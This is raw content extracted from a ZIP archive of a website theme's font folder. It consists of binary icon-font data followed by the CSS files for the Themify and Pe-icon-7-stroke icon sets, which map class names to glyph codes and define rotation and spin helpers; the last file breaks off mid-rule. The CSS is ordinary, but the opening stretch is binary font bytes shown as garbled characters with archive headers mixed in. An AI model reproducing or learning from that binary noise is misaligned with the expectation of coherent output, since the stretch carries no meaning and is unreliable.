����-Y��%&''.7&>7.>?>?'./.67.7&>76'7>&'.'?>>6.'./7>7>&/72-/



	

1.3/16/l020




	�
.
j13/




	
.a/c

v0	

	

	1

11/31l/11
	
*/m111




��	


1
a1c		,����'!!3/#35?#'37�'��'�O���<;4ml���O11�Y�E*T�74����)>"32>54.#".54>32#3".54>32#2XA&&AX22XA&&AX2\��&AX22XA&&AX22XA&���!!'!'7!7?'����S��=<��e������x����(��<;�����-����([��".54>7>7>7#7"#".#"32>32>7>54.##".'4"0"#*27>7><'0.'."#*>7>3227>4'.'*M;#&$
	
	#%"9L*�		
#

&#
@	
	
		8L--B-
		.D..K6�

	
�/��77'77'7''75�c�,�b��c��c�b�c+��*�\RY�[PY
]TWYR\OkQVV��'73?!7!7!7!�HܽR	t���I������IIa(,,\Q4Q���.C\u%#4.#52234.#4.#"32>5##".54>324.#!"3!2>52#!".54>3!,1A&,L9!�=hM,1VsC[
	



	
i	�Z		�	-�Z�:%@0 9K+=,Mh=CsV1��



	

	Z�		�Z		��Z����.C#.#72236.#6.#"32>'##".7&>32Q/To@E{[6��f��JP��kw

		


		
 >nR/4ZyDK��el��O�<
		
				ɵ��_<�ϥR�ϥR�����	�������	d=<i���<�����k�%Z<ii� #'#<;[��>/^"-��#��r2���	x2?42<<<xIZ	Z`$ZZ�<ZZx�x�<<)ZZZZ4<I<3-'�6<Z��<ZZQKZZK<,]x:"�*'AlC4,-
H��:�D@��p��R�	j	�
"
~B�"N��

R
��,��T�L���&��l���J��>�<��6Z�8x���r�(D�����0�  ` � � �!!d!�!�!�"
""":"�"�##`#~#�#�#�$p%v%�&*&�&�&�''L'�(6(�)�*�*�++(+T+�+�,(,F,d,�-�.�/./�/�0B0�0�11R22T2�323�3�4r4�55�5�6`6�7*7�8n8�8�96:$:J:x:�;P<<^=4=�>>@>b>�>�??<?r?�@@~@�@�@�AApA�B�B�CfC�D(D�E>EpE�E�FFFzF�GG>GdG�G�H�H�I0IdJ�L�M^M�N&N�O�R�SBS�TT^T�T�ULUfU�U�VVDV|V�W�X<X�YY^YvY�Y�Y�ZLZ�[([V[�[�[�[�\�]v^$^P^r^�^�__6_t_�_�_�``D`l`�`�aa0ahavbNb�ccxc�c�c�d&dRd�d�d�e,eTe�ffjgg�h�i�j�k�l@l�m�m�m�nnPnloo�qjst>t�uJvLv�v�wfw�x$xfy yxz"z�z�z�{{6{L||�}�}�}�~R �b�R���N���������~�ʈ�v����6�^�揠���ԑ,�\�V�����F��d�-�G$U2
(c		G	$	U		9	
(cthemifyVersion 1.0themifythemifythemifyRegularthemifyGenerated by IcoMoonPK!B�r*3@3@0it_sanctum/fonts/themify-icons/themify-icons.cssnu&1i�@font-face {
	font-family: 'themify';
	src:url('fonts/themify.eot?-fvbane');
	src:url('fonts/themify.eot?#iefix-fvbane') format('embedded-opentype'),
		url('fonts/themify.woff?-fvbane') format('woff'),
		url('fonts/themify.ttf?-fvbane') format('truetype'),
		url('fonts/themify.svg?-fvbane#themify') format('svg');
	font-weight: normal;
	font-style: normal;
}

[class^="ti-"], [class*=" ti-"] {
	font-family: 'themify';
	speak: none;
	font-style: normal;
	font-weight: normal;
	font-variant: normal;
	text-transform: none;
	line-height: 1;

	/* Better Font Rendering =========== */
	-webkit-font-smoothing: antialiased;
	-moz-osx-font-smoothing: grayscale;
}

.ti-wand:before {
	content: "\e600";
}
.ti-volume:before {
	content: "\e601";
}
.ti-user:before {
	content: "\e602";
}
.ti-unlock:before {
	content: "\e603";
}
.ti-unlink:before {
	content: "\e604";
}
.ti-trash:before {
	content: "\e605";
}
.ti-thought:before {
	content: "\e606";
}
.ti-target:before {
	content: "\e607";
}
.ti-tag:before {
	content: "\e608";
}
.ti-tablet:before {
	content: "\e609";
}
.ti-star:before {
	content: "\e60a";
}
.ti-spray:before {
	content: "\e60b";
}
.ti-signal:before {
	content: "\e60c";
}
.ti-shopping-cart:before {
	content: "\e60d";
}
.ti-shopping-cart-full:before {
	content: "\e60e";
}
.ti-settings:before {
	content: "\e60f";
}
.ti-search:before {
	content: "\e610";
}
.ti-zoom-in:before {
	content: "\e611";
}
.ti-zoom-out:before {
	content: "\e612";
}
.ti-cut:before {
	content: "\e613";
}
.ti-ruler:before {
	content: "\e614";
}
.ti-ruler-pencil:before {
	content: "\e615";
}
.ti-ruler-alt:before {
	content: "\e616";
}
.ti-bookmark:before {
	content: "\e617";
}
.ti-bookmark-alt:before {
	content: "\e618";
}
.ti-reload:before {
	content: "\e619";
}
.ti-plus:before {
	content: "\e61a";
}
.ti-pin:before {
	content: "\e61b";
}
.ti-pencil:before {
	content: "\e61c";
}
.ti-pencil-alt:before {
	content: "\e61d";
}
.ti-paint-roller:before {
	content: "\e61e";
}
.ti-paint-bucket:before {
	content: "\e61f";
}
.ti-na:before {
	content: "\e620";
}
.ti-mobile:before {
	content: "\e621";
}
.ti-minus:before {
	content: "\e622";
}
.ti-medall:before {
	content: "\e623";
}
.ti-medall-alt:before {
	content: "\e624";
}
.ti-marker:before {
	content: "\e625";
}
.ti-marker-alt:before {
	content: "\e626";
}
.ti-arrow-up:before {
	content: "\e627";
}
.ti-arrow-right:before {
	content: "\e628";
}
.ti-arrow-left:before {
	content: "\e629";
}
.ti-arrow-down:before {
	content: "\e62a";
}
.ti-lock:before {
	content: "\e62b";
}
.ti-location-arrow:before {
	content: "\e62c";
}
.ti-link:before {
	content: "\e62d";
}
.ti-layout:before {
	content: "\e62e";
}
.ti-layers:before {
	content: "\e62f";
}
.ti-layers-alt:before {
	content: "\e630";
}
.ti-key:before {
	content: "\e631";
}
.ti-import:before {
	content: "\e632";
}
.ti-image:before {
	content: "\e633";
}
.ti-heart:before {
	content: "\e634";
}
.ti-heart-broken:before {
	content: "\e635";
}
.ti-hand-stop:before {
	content: "\e636";
}
.ti-hand-open:before {
	content: "\e637";
}
.ti-hand-drag:before {
	content: "\e638";
}
.ti-folder:before {
	content: "\e639";
}
.ti-flag:before {
	content: "\e63a";
}
.ti-flag-alt:before {
	content: "\e63b";
}
.ti-flag-alt-2:before {
	content: "\e63c";
}
.ti-eye:before {
	content: "\e63d";
}
.ti-export:before {
	content: "\e63e";
}
.ti-exchange-vertical:before {
	content: "\e63f";
}
.ti-desktop:before {
	content: "\e640";
}
.ti-cup:before {
	content: "\e641";
}
.ti-crown:before {
	content: "\e642";
}
.ti-comments:before {
	content: "\e643";
}
.ti-comment:before {
	content: "\e644";
}
.ti-comment-alt:before {
	content: "\e645";
}
.ti-close:before {
	content: "\e646";
}
.ti-clip:before {
	content: "\e647";
}
.ti-angle-up:before {
	content: "\e648";
}
.ti-angle-right:before {
	content: "\e649";
}
.ti-angle-left:before {
	content: "\e64a";
}
.ti-angle-down:before {
	content: "\e64b";
}
.ti-check:before {
	content: "\e64c";
}
.ti-check-box:before {
	content: "\e64d";
}
.ti-camera:before {
	content: "\e64e";
}
.ti-announcement:before {
	content: "\e64f";
}
.ti-brush:before {
	content: "\e650";
}
.ti-briefcase:before {
	content: "\e651";
}
.ti-bolt:before {
	content: "\e652";
}
.ti-bolt-alt:before {
	content: "\e653";
}
.ti-blackboard:before {
	content: "\e654";
}
.ti-bag:before {
	content: "\e655";
}
.ti-move:before {
	content: "\e656";
}
.ti-arrows-vertical:before {
	content: "\e657";
}
.ti-arrows-horizontal:before {
	content: "\e658";
}
.ti-fullscreen:before {
	content: "\e659";
}
.ti-arrow-top-right:before {
	content: "\e65a";
}
.ti-arrow-top-left:before {
	content: "\e65b";
}
.ti-arrow-circle-up:before {
	content: "\e65c";
}
.ti-arrow-circle-right:before {
	content: "\e65d";
}
.ti-arrow-circle-left:before {
	content: "\e65e";
}
.ti-arrow-circle-down:before {
	content: "\e65f";
}
.ti-angle-double-up:before {
	content: "\e660";
}
.ti-angle-double-right:before {
	content: "\e661";
}
.ti-angle-double-left:before {
	content: "\e662";
}
.ti-angle-double-down:before {
	content: "\e663";
}
.ti-zip:before {
	content: "\e664";
}
.ti-world:before {
	content: "\e665";
}
.ti-wheelchair:before {
	content: "\e666";
}
.ti-view-list:before {
	content: "\e667";
}
.ti-view-list-alt:before {
	content: "\e668";
}
.ti-view-grid:before {
	content: "\e669";
}
.ti-uppercase:before {
	content: "\e66a";
}
.ti-upload:before {
	content: "\e66b";
}
.ti-underline:before {
	content: "\e66c";
}
.ti-truck:before {
	content: "\e66d";
}
.ti-timer:before {
	content: "\e66e";
}
.ti-ticket:before {
	content: "\e66f";
}
.ti-thumb-up:before {
	content: "\e670";
}
.ti-thumb-down:before {
	content: "\e671";
}
.ti-text:before {
	content: "\e672";
}
.ti-stats-up:before {
	content: "\e673";
}
.ti-stats-down:before {
	content: "\e674";
}
.ti-split-v:before {
	content: "\e675";
}
.ti-split-h:before {
	content: "\e676";
}
.ti-smallcap:before {
	content: "\e677";
}
.ti-shine:before {
	content: "\e678";
}
.ti-shift-right:before {
	content: "\e679";
}
.ti-shift-left:before {
	content: "\e67a";
}
.ti-shield:before {
	content: "\e67b";
}
.ti-notepad:before {
	content: "\e67c";
}
.ti-server:before {
	content: "\e67d";
}
.ti-quote-right:before {
	content: "\e67e";
}
.ti-quote-left:before {
	content: "\e67f";
}
.ti-pulse:before {
	content: "\e680";
}
.ti-printer:before {
	content: "\e681";
}
.ti-power-off:before {
	content: "\e682";
}
.ti-plug:before {
	content: "\e683";
}
.ti-pie-chart:before {
	content: "\e684";
}
.ti-paragraph:before {
	content: "\e685";
}
.ti-panel:before {
	content: "\e686";
}
.ti-package:before {
	content: "\e687";
}
.ti-music:before {
	content: "\e688";
}
.ti-music-alt:before {
	content: "\e689";
}
.ti-mouse:before {
	content: "\e68a";
}
.ti-mouse-alt:before {
	content: "\e68b";
}
.ti-money:before {
	content: "\e68c";
}
.ti-microphone:before {
	content: "\e68d";
}
.ti-menu:before {
	content: "\e68e";
}
.ti-menu-alt:before {
	content: "\e68f";
}
.ti-map:before {
	content: "\e690";
}
.ti-map-alt:before {
	content: "\e691";
}
.ti-loop:before {
	content: "\e692";
}
.ti-location-pin:before {
	content: "\e693";
}
.ti-list:before {
	content: "\e694";
}
.ti-light-bulb:before {
	content: "\e695";
}
.ti-Italic:before {
	content: "\e696";
}
.ti-info:before {
	content: "\e697";
}
.ti-infinite:before {
	content: "\e698";
}
.ti-id-badge:before {
	content: "\e699";
}
.ti-hummer:before {
	content: "\e69a";
}
.ti-home:before {
	content: "\e69b";
}
.ti-help:before {
	content: "\e69c";
}
.ti-headphone:before {
	content: "\e69d";
}
.ti-harddrives:before {
	content: "\e69e";
}
.ti-harddrive:before {
	content: "\e69f";
}
.ti-gift:before {
	content: "\e6a0";
}
.ti-game:before {
	content: "\e6a1";
}
.ti-filter:before {
	content: "\e6a2";
}
.ti-files:before {
	content: "\e6a3";
}
.ti-file:before {
	content: "\e6a4";
}
.ti-eraser:before {
	content: "\e6a5";
}
.ti-envelope:before {
	content: "\e6a6";
}
.ti-download:before {
	content: "\e6a7";
}
.ti-direction:before {
	content: "\e6a8";
}
.ti-direction-alt:before {
	content: "\e6a9";
}
.ti-dashboard:before {
	content: "\e6aa";
}
.ti-control-stop:before {
	content: "\e6ab";
}
.ti-control-shuffle:before {
	content: "\e6ac";
}
.ti-control-play:before {
	content: "\e6ad";
}
.ti-control-pause:before {
	content: "\e6ae";
}
.ti-control-forward:before {
	content: "\e6af";
}
.ti-control-backward:before {
	content: "\e6b0";
}
.ti-cloud:before {
	content: "\e6b1";
}
.ti-cloud-up:before {
	content: "\e6b2";
}
.ti-cloud-down:before {
	content: "\e6b3";
}
.ti-clipboard:before {
	content: "\e6b4";
}
.ti-car:before {
	content: "\e6b5";
}
.ti-calendar:before {
	content: "\e6b6";
}
.ti-book:before {
	content: "\e6b7";
}
.ti-bell:before {
	content: "\e6b8";
}
.ti-basketball:before {
	content: "\e6b9";
}
.ti-bar-chart:before {
	content: "\e6ba";
}
.ti-bar-chart-alt:before {
	content: "\e6bb";
}
.ti-back-right:before {
	content: "\e6bc";
}
.ti-back-left:before {
	content: "\e6bd";
}
.ti-arrows-corner:before {
	content: "\e6be";
}
.ti-archive:before {
	content: "\e6bf";
}
.ti-anchor:before {
	content: "\e6c0";
}
.ti-align-right:before {
	content: "\e6c1";
}
.ti-align-left:before {
	content: "\e6c2";
}
.ti-align-justify:before {
	content: "\e6c3";
}
.ti-align-center:before {
	content: "\e6c4";
}
.ti-alert:before {
	content: "\e6c5";
}
.ti-alarm-clock:before {
	content: "\e6c6";
}
.ti-agenda:before {
	content: "\e6c7";
}
.ti-write:before {
	content: "\e6c8";
}
.ti-window:before {
	content: "\e6c9";
}
.ti-widgetized:before {
	content: "\e6ca";
}
.ti-widget:before {
	content: "\e6cb";
}
.ti-widget-alt:before {
	content: "\e6cc";
}
.ti-wallet:before {
	content: "\e6cd";
}
.ti-video-clapper:before {
	content: "\e6ce";
}
.ti-video-camera:before {
	content: "\e6cf";
}
.ti-vector:before {
	content: "\e6d0";
}
.ti-themify-logo:before {
	content: "\e6d1";
}
.ti-themify-favicon:before {
	content: "\e6d2";
}
.ti-themify-favicon-alt:before {
	content: "\e6d3";
}
.ti-support:before {
	content: "\e6d4";
}
.ti-stamp:before {
	content: "\e6d5";
}
.ti-split-v-alt:before {
	content: "\e6d6";
}
.ti-slice:before {
	content: "\e6d7";
}
.ti-shortcode:before {
	content: "\e6d8";
}
.ti-shift-right-alt:before {
	content: "\e6d9";
}
.ti-shift-left-alt:before {
	content: "\e6da";
}
.ti-ruler-alt-2:before {
	content: "\e6db";
}
.ti-receipt:before {
	content: "\e6dc";
}
.ti-pin2:before {
	content: "\e6dd";
}
.ti-pin-alt:before {
	content: "\e6de";
}
.ti-pencil-alt2:before {
	content: "\e6df";
}
.ti-palette:before {
	content: "\e6e0";
}
.ti-more:before {
	content: "\e6e1";
}
.ti-more-alt:before {
	content: "\e6e2";
}
.ti-microphone-alt:before {
	content: "\e6e3";
}
.ti-magnet:before {
	content: "\e6e4";
}
.ti-line-double:before {
	content: "\e6e5";
}
.ti-line-dotted:before {
	content: "\e6e6";
}
.ti-line-dashed:before {
	content: "\e6e7";
}
.ti-layout-width-full:before {
	content: "\e6e8";
}
.ti-layout-width-default:before {
	content: "\e6e9";
}
.ti-layout-width-default-alt:before {
	content: "\e6ea";
}
.ti-layout-tab:before {
	content: "\e6eb";
}
.ti-layout-tab-window:before {
	content: "\e6ec";
}
.ti-layout-tab-v:before {
	content: "\e6ed";
}
.ti-layout-tab-min:before {
	content: "\e6ee";
}
.ti-layout-slider:before {
	content: "\e6ef";
}
.ti-layout-slider-alt:before {
	content: "\e6f0";
}
.ti-layout-sidebar-right:before {
	content: "\e6f1";
}
.ti-layout-sidebar-none:before {
	content: "\e6f2";
}
.ti-layout-sidebar-left:before {
	content: "\e6f3";
}
.ti-layout-placeholder:before {
	content: "\e6f4";
}
.ti-layout-menu:before {
	content: "\e6f5";
}
.ti-layout-menu-v:before {
	content: "\e6f6";
}
.ti-layout-menu-separated:before {
	content: "\e6f7";
}
.ti-layout-menu-full:before {
	content: "\e6f8";
}
.ti-layout-media-right-alt:before {
	content: "\e6f9";
}
.ti-layout-media-right:before {
	content: "\e6fa";
}
.ti-layout-media-overlay:before {
	content: "\e6fb";
}
.ti-layout-media-overlay-alt:before {
	content: "\e6fc";
}
.ti-layout-media-overlay-alt-2:before {
	content: "\e6fd";
}
.ti-layout-media-left-alt:before {
	content: "\e6fe";
}
.ti-layout-media-left:before {
	content: "\e6ff";
}
.ti-layout-media-center-alt:before {
	content: "\e700";
}
.ti-layout-media-center:before {
	content: "\e701";
}
.ti-layout-list-thumb:before {
	content: "\e702";
}
.ti-layout-list-thumb-alt:before {
	content: "\e703";
}
.ti-layout-list-post:before {
	content: "\e704";
}
.ti-layout-list-large-image:before {
	content: "\e705";
}
.ti-layout-line-solid:before {
	content: "\e706";
}
.ti-layout-grid4:before {
	content: "\e707";
}
.ti-layout-grid3:before {
	content: "\e708";
}
.ti-layout-grid2:before {
	content: "\e709";
}
.ti-layout-grid2-thumb:before {
	content: "\e70a";
}
.ti-layout-cta-right:before {
	content: "\e70b";
}
.ti-layout-cta-left:before {
	content: "\e70c";
}
.ti-layout-cta-center:before {
	content: "\e70d";
}
.ti-layout-cta-btn-right:before {
	content: "\e70e";
}
.ti-layout-cta-btn-left:before {
	content: "\e70f";
}
.ti-layout-column4:before {
	content: "\e710";
}
.ti-layout-column3:before {
	content: "\e711";
}
.ti-layout-column2:before {
	content: "\e712";
}
.ti-layout-accordion-separated:before {
	content: "\e713";
}
.ti-layout-accordion-merged:before {
	content: "\e714";
}
.ti-layout-accordion-list:before {
	content: "\e715";
}
.ti-ink-pen:before {
	content: "\e716";
}
.ti-info-alt:before {
	content: "\e717";
}
.ti-help-alt:before {
	content: "\e718";
}
.ti-headphone-alt:before {
	content: "\e719";
}
.ti-hand-point-up:before {
	content: "\e71a";
}
.ti-hand-point-right:before {
	content: "\e71b";
}
.ti-hand-point-left:before {
	content: "\e71c";
}
.ti-hand-point-down:before {
	content: "\e71d";
}
.ti-gallery:before {
	content: "\e71e";
}
.ti-face-smile:before {
	content: "\e71f";
}
.ti-face-sad:before {
	content: "\e720";
}
.ti-credit-card:before {
	content: "\e721";
}
.ti-control-skip-forward:before {
	content: "\e722";
}
.ti-control-skip-backward:before {
	content: "\e723";
}
.ti-control-record:before {
	content: "\e724";
}
.ti-control-eject:before {
	content: "\e725";
}
.ti-comments-smiley:before {
	content: "\e726";
}
.ti-brush-alt:before {
	content: "\e727";
}
.ti-youtube:before {
	content: "\e728";
}
.ti-vimeo:before {
	content: "\e729";
}
.ti-twitter:before {
	content: "\e72a";
}
.ti-time:before {
	content: "\e72b";
}
.ti-tumblr:before {
	content: "\e72c";
}
.ti-skype:before {
	content: "\e72d";
}
.ti-share:before {
	content: "\e72e";
}
.ti-share-alt:before {
	content: "\e72f";
}
.ti-rocket:before {
	content: "\e730";
}
.ti-pinterest:before {
	content: "\e731";
}
.ti-new-window:before {
	content: "\e732";
}
.ti-microsoft:before {
	content: "\e733";
}
.ti-list-ol:before {
	content: "\e734";
}
.ti-linkedin:before {
	content: "\e735";
}
.ti-layout-sidebar-2:before {
	content: "\e736";
}
.ti-layout-grid4-alt:before {
	content: "\e737";
}
.ti-layout-grid3-alt:before {
	content: "\e738";
}
.ti-layout-grid2-alt:before {
	content: "\e739";
}
.ti-layout-column4-alt:before {
	content: "\e73a";
}
.ti-layout-column3-alt:before {
	content: "\e73b";
}
.ti-layout-column2-alt:before {
	content: "\e73c";
}
.ti-instagram:before {
	content: "\e73d";
}
.ti-google:before {
	content: "\e73e";
}
.ti-github:before {
	content: "\e73f";
}
.ti-flickr:before {
	content: "\e740";
}
.ti-facebook:before {
	content: "\e741";
}
.ti-dropbox:before {
	content: "\e742";
}
.ti-dribbble:before {
	content: "\e743";
}
.ti-apple:before {
	content: "\e744";
}
.ti-android:before {
	content: "\e745";
}
.ti-save:before {
	content: "\e746";
}
.ti-save-alt:before {
	content: "\e747";
}
.ti-yahoo:before {
	content: "\e748";
}
.ti-wordpress:before {
	content: "\e749";
}
.ti-vimeo-alt:before {
	content: "\e74a";
}
.ti-twitter-alt:before {
	content: "\e74b";
}
.ti-tumblr-alt:before {
	content: "\e74c";
}
.ti-trello:before {
	content: "\e74d";
}
.ti-stack-overflow:before {
	content: "\e74e";
}
.ti-soundcloud:before {
	content: "\e74f";
}
.ti-sharethis:before {
	content: "\e750";
}
.ti-sharethis-alt:before {
	content: "\e751";
}
.ti-reddit:before {
	content: "\e752";
}
.ti-pinterest-alt:before {
	content: "\e753";
}
.ti-microsoft-alt:before {
	content: "\e754";
}
.ti-linux:before {
	content: "\e755";
}
.ti-jsfiddle:before {
	content: "\e756";
}
.ti-joomla:before {
	content: "\e757";
}
.ti-html5:before {
	content: "\e758";
}
.ti-flickr-alt:before {
	content: "\e759";
}
.ti-email:before {
	content: "\e75a";
}
.ti-drupal:before {
	content: "\e75b";
}
.ti-dropbox-alt:before {
	content: "\e75c";
}
.ti-css3:before {
	content: "\e75d";
}
.ti-rss:before {
	content: "\e75e";
}
.ti-rss-alt:before {
	content: "\e75f";
}
PK!���m��0it_sanctum/fonts/pe-icon-7-stroke/css/helper.cssnu&1i�
/* HELPER CLASS 
 * -------------------------- */

/* FA based classes */

/*! Modified from font-awesome helper CSS classes - PIXEDEN
 *  Font Awesome 4.0.3 by @davegandy - http://fontawesome.io - @fontawesome
 *  License - http://fontawesome.io/license (CSS: MIT License)
 */

/* makes the font 33% larger relative to the icon container */
.pe-lg {
  font-size: 1.3333333333333333em;
  line-height: 0.75em;
  vertical-align: -15%;
}
.pe-2x {
  font-size: 2em;
}
.pe-3x {
  font-size: 3em;
}
.pe-4x {
  font-size: 4em;
}
.pe-5x {
  font-size: 5em;
}
.pe-fw {
  width: 1.2857142857142858em;
  text-align: center;
}
.pe-ul {
  padding-left: 0;
  margin-left: 2.142857142857143em;
  list-style-type: none;
}
.pe-ul > li {
  position: relative;
}
.pe-li {
  position: absolute;
  left: -2.142857142857143em;
  width: 2.142857142857143em;
  top: 0.14285714285714285em;
  text-align: center;
}
.pe-li.pe-lg {
  left: -1.8571428571428572em;
}
.pe-border {
  padding: .2em .25em .15em;
  border: solid 0.08em #eeeeee;
  border-radius: .1em;
}
.pull-right {
  float: right;
}
.pull-left {
  float: left;
}
.pe.pull-left {
  margin-right: .3em;
}
.pe.pull-right {
  margin-left: .3em;
}
.pe-spin {
  -webkit-animation: spin 2s infinite linear;
  -moz-animation: spin 2s infinite linear;
  -o-animation: spin 2s infinite linear;
  animation: spin 2s infinite linear;
}
@-moz-keyframes spin {
  0% {
    -moz-transform: rotate(0deg);
  }
  100% {
    -moz-transform: rotate(359deg);
  }
}
@-webkit-keyframes spin {
  0% {
    -webkit-transform: rotate(0deg);
  }
  100% {
    -webkit-transform: rotate(359deg);
  }
}
@-o-keyframes spin {
  0% {
    -o-transform: rotate(0deg);
  }
  100% {
    -o-transform: rotate(359deg);
  }
}
@-ms-keyframes spin {
  0% {
    -ms-transform: rotate(0deg);
  }
  100% {
    -ms-transform: rotate(359deg);
  }
}
@keyframes spin {
  0% {
    transform: rotate(0deg);
  }
  100% {
    transform: rotate(359deg);
  }
}
.pe-rotate-90 {
  filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=1);
  -webkit-transform: rotate(90deg);
  -moz-transform: rotate(90deg);
  -ms-transform: rotate(90deg);
  -o-transform: rotate(90deg);
  transform: rotate(90deg);
}
.pe-rotate-180 {
  filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=2);
  -webkit-transform: rotate(180deg);
  -moz-transform: rotate(180deg);
  -ms-transform: rotate(180deg);
  -o-transform: rotate(180deg);
  transform: rotate(180deg);
}
.pe-rotate-270 {
  filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=3);
  -webkit-transform: rotate(270deg);
  -moz-transform: rotate(270deg);
  -ms-transform: rotate(270deg);
  -o-transform: rotate(270deg);
  transform: rotate(270deg);
}
.pe-flip-horizontal {
  filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1);
  -webkit-transform: scale(-1, 1);
  -moz-transform: scale(-1, 1);
  -ms-transform: scale(-1, 1);
  -o-transform: scale(-1, 1);
  transform: scale(-1, 1);
}
.pe-flip-vertical {
  filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1);
  -webkit-transform: scale(1, -1);
  -moz-transform: scale(1, -1);
  -ms-transform: scale(1, -1);
  -o-transform: scale(1, -1);
  transform: scale(1, -1);
}
.pe-stack {
  position: relative;
  display: inline-block;
  width: 2em;
  height: 2em;
  line-height: 2em;
  vertical-align: middle;
}
.pe-stack-1x,
.pe-stack-2x {
  position: absolute;
  left: 0;
  width: 100%;
  text-align: center;
}
.pe-stack-1x {
  line-height: inherit;
}
.pe-stack-2x {
  font-size: 2em;
}
.pe-inverse {
  color: #ffffff;
}

/* Custom classes / mods - PIXEDEN */
.pe-va {
  vertical-align: middle;
}

.pe-border {
  border: solid 0.08em #eaeaea;
}

[class^="pe-7s-"], [class*=" pe-7s-"] {
  display: inline-block;
}PK!�&�Y&&:it_sanctum/fonts/pe-icon-7-stroke/css/pe-icon-7-stroke.cssnu&1i�@font-face {
	font-family: 'Pe-icon-7-stroke';
	src:url('../fonts/Pe-icon-7-stroke.eot?d7yf1v');
	src:url('../fonts/Pe-icon-7-stroke.eot?#iefixd7yf1v') format('embedded-opentype'),
		url('../fonts/Pe-icon-7-stroke.woff?d7yf1v') format('woff'),
		url('../fonts/Pe-icon-7-stroke.ttf?d7yf1v') format('truetype'),
		url('../fonts/Pe-icon-7-stroke.svg?d7yf1v#Pe-icon-7-stroke') format('svg');
	font-weight: normal;
	font-style: normal;
}

[class^="pe-7s-"], [class*=" pe-7s-"] {
	display: inline-block;
	font-family: 'Pe-icon-7-stroke';
	speak: none;
	font-style: normal;
	font-weight: normal;
	font-variant: normal;
	text-transform: none;
	line-height: 1;

	/* Better Font Rendering =========== */
	-webkit-font-smoothing: antialiased;
	-moz-osx-font-smoothing: grayscale;
}

.pe-7s-album:before {
	content: "\e6aa";
}
.pe-7s-arc:before {
	content: "\e6ab";
}
.pe-7s-back-2:before {
	content: "\e6ac";
}
.pe-7s-bandaid:before {
	content: "\e6ad";
}
.pe-7s-car:before {
	content: "\e6ae";
}
.pe-7s-diamond:before {
	content: "\e6af";
}
.pe-7s-door-lock:before {
	content: "\e6b0";
}
.pe-7s-eyedropper:before {
	content: "\e6b1";
}
.pe-7s-female:before {
	content: "\e6b2";
}
.pe-7s-gym:before {
	content: "\e6b3";
}
.pe-7s-hammer:before {
	content: "\e6b4";
}
.pe-7s-headphones:before {
	content: "\e6b5";
}
.pe-7s-helm:before {
	content: "\e6b6";
}
.pe-7s-hourglass:before {
	content: "\e6b7";
}
.pe-7s-leaf:before {
	content: "\e6b8";
}
.pe-7s-magic-wand:before {
	content: "\e6b9";
}
.pe-7s-male:before {
	content: "\e6ba";
}
.pe-7s-map-2:before {
	content: "\e6bb";
}
.pe-7s-next-2:before {
	content: "\e6bc";
}
.pe-7s-paint-bucket:before {
	content: "\e6bd";
}
.pe-7s-pendrive:before {
	content: "\e6be";
}
.pe-7s-photo:before {
	content: "\e6bf";
}
.pe-7s-piggy:before {
	content: "\e6c0";
}
.pe-7s-plugin:before {
	content: "\e6c1";
}
.pe-7s-refresh-2:before {
	content: "\e6c2";
}
.pe-7s-rocket:before {
	content: "\e6c3";
}
.pe-7s-settings:before {
	content: "\e6c4";
}
.pe-7s-shield:before {
	content: "\e6c5";
}
.pe-7s-smile:before {
	content: "\e6c6";
}
.pe-7s-usb:before {
	content: "\e6c7";
}
.pe-7s-vector:before {
	content: "\e6c8";
}
.pe-7s-wine:before {
	content: "\e6c9";
}
.pe-7s-cloud-upload:before {
	content: "\e68a";
}
.pe-7s-cash:before {
	content: "\e68c";
}
.pe-7s-close:before {
	content: "\e680";
}
.pe-7s-bluetooth:before {
	content: "\e68d";
}
.pe-7s-cloud-download:before {
	content: "\e68b";
}
.pe-7s-way:before {
	content: "\e68e";
}
.pe-7s-close-circle:before {
	content: "\e681";
}
.pe-7s-id:before {
	content: "\e68f";
}
.pe-7s-angle-up:before {
	content: "\e682";
}
.pe-7s-wristwatch:before {
	content: "\e690";
}
.pe-7s-angle-up-circle:before {
	content: "\e683";
}
.pe-7s-world:before {
	content: "\e691";
}
.pe-7s-angle-right:before {
	content: "\e684";
}
.pe-7s-volume:before {
	content: "\e692";
}
.pe-7s-angle-right-circle:before {
	content: "\e685";
}
.pe-7s-users:before {
	content: "\e693";
}
.pe-7s-angle-left:before {
	content: "\e686";
}
.pe-7s-user-female:before {
	content: "\e694";
}
.pe-7s-angle-left-circle:before {
	content: "\e687";
}
.pe-7s-up-arrow:before {
	content: "\e695";
}
.pe-7s-angle-down:before {
	content: "\e688";
}
.pe-7s-switch:before {
	content: "\e696";
}
.pe-7s-angle-down-circle:before {
	content: "\e689";
}
.pe-7s-scissors:before {
	content: "\e697";
}
.pe-7s-wallet:before {
	content: "\e600";
}
.pe-7s-safe:before {
	content: "\e698";
}
.pe-7s-volume2:before {
	content: "\e601";
}
.pe-7s-volume1:before {
	content: "\e602";
}
.pe-7s-voicemail:before {
	content: "\e603";
}
.pe-7s-video:before {
	content: "\e604";
}
.pe-7s-user:before {
	content: "\e605";
}
.pe-7s-upload:before {
	content: "\e606";
}
.pe-7s-unlock:before {
	content: "\e607";
}
.pe-7s-umbrella:before {
	content: "\e608";
}
.pe-7s-trash:before {
	content: "\e609";
}
.pe-7s-tools:before {
	content: "\e60a";
}
.pe-7s-timer:before {
	content: "\e60b";
}
.pe-7s-ticket:before {
	content: "\e60c";
}
.pe-7s-target:before {
	content: "\e60d";
}
.pe-7s-sun:before {
	content: "\e60e";
}
.pe-7s-study:before {
	content: "\e60f";
}
.pe-7s-stopwatch:before {
	content: "\e610";
}
.pe-7s-star:before {
	content: "\e611";
}
.pe-7s-speaker:before {
	content: "\e612";
}
.pe-7s-signal:before {
	content: "\e613";
}
.pe-7s-shuffle:before {
	content: "\e614";
}
.pe-7s-shopbag:before {
	content: "\e615";
}
.pe-7s-share:before {
	content: "\e616";
}
.pe-7s-server:before {
	content: "\e617";
}
.pe-7s-search:before {
	content: "\e618";
}
.pe-7s-film:before {
	content: "\e6a5";
}
.pe-7s-science:before {
	content: "\e619";
}
.pe-7s-disk:before {
	content: "\e6a6";
}
.pe-7s-ribbon:before {
	content: "\e61a";
}
.pe-7s-repeat:before {
	content: "\e61b";
}
.pe-7s-refresh:before {
	content: "\e61c";
}
.pe-7s-add-user:before {
	content: "\e6a9";
}
.pe-7s-refresh-cloud:before {
	content: "\e61d";
}
.pe-7s-paperclip:before {
	content: "\e69c";
}
.pe-7s-radio:before {
